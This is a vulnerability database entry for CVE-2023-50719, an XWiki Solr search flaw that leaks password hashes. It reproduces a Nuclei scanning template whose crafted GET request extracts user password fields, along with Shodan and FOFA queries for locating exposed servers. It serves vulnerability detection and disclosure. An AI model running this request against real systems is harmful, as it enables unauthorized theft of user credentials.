Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-50719
HistoryJun 18, 2024 - 10:34 a.m.

XWiki < 4.10.15 - Sensitive Information Disclosure

2024-06-1810:34:34
ProjectDiscovery
github.com
23
xwiki
sensitive information
disclosure
solr
search
passwords

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

6.7

Confidence

High

EPSS

0.473

Percentile

97.5%

XWiki Platform is a generic wiki platform. Starting in 7.2-milestone-2 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the password hashes of all users to anyone with view right on the respective user profiles. By default, all user profiles are public. This vulnerability also affects any configurations used by extensions that contain passwords like API keys that are viewable for the attacker. Normally, such passwords aren't accessible but this vulnerability would disclose them as plain text. This has been patched in XWiki 14.10.15, 15.5.2 and 15.7RC1. There are no known workarounds for this vulnerability.
id: CVE-2023-50719

info:
  name: XWiki < 4.10.15 - Sensitive Information Disclosure
  author: ritikchaddha
  severity: high
  description: |
    XWiki Platform is a generic wiki platform. Starting in 7.2-milestone-2 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the password hashes of all users to anyone with view right on the respective user profiles. By default, all user profiles are public. This vulnerability also affects any configurations used by extensions that contain passwords like API keys that are viewable for the attacker. Normally, such passwords aren't accessible but this vulnerability would disclose them as plain text. This has been patched in XWiki 14.10.15, 15.5.2 and 15.7RC1. There are no known workarounds for this vulnerability.
  impact: |
    Successful exploitation could lead to disclosure of the password hashes of all users.
  remediation: |
    This has been patched in XWiki 14.10.15, 15.5.2 and 15.7RC1.
  reference:
    - https://jira.xwiki.org/browse/XWIKI-21208
    - https://nvd.nist.gov/vuln/detail/CVE-2023-50719
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-50719
    cwe-id: CWE-359
    cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    verified: true
    vendor: xwiki
    product: xwiki
    shodan-query: html:"data-xwiki-reference"
    fofa-query: body="data-xwiki-reference"
  tags: cve,cve2024,xwiki,password,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/bin/view/Main/Search?r=1&text=propertyvalue%3A%3F*%20AND%20reference%3A*.password&f_locale=en&f_locale="
      - "{{BaseURL}}/xwiki/bin/view/Main/Search?r=1&text=propertyvalue%3A%3F*%20AND%20reference%3A*.password&f_locale=en&f_locale="

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "hash:SHA</span>"
          - "XWikiUsers[0].password"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502202437cb05b76cc5a1500aecb995aa4be41861019af9c10335562818daa42e9e73022100a898352082fe08b207ef79b8b9d95c2053177f0beabcf3e7b7fe7c3172155532:922c64590222798bb761d5b6d8e72950

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

6.7

Confidence

High

EPSS

0.473

Percentile

97.5%

Related for NUCLEI:CVE-2023-50719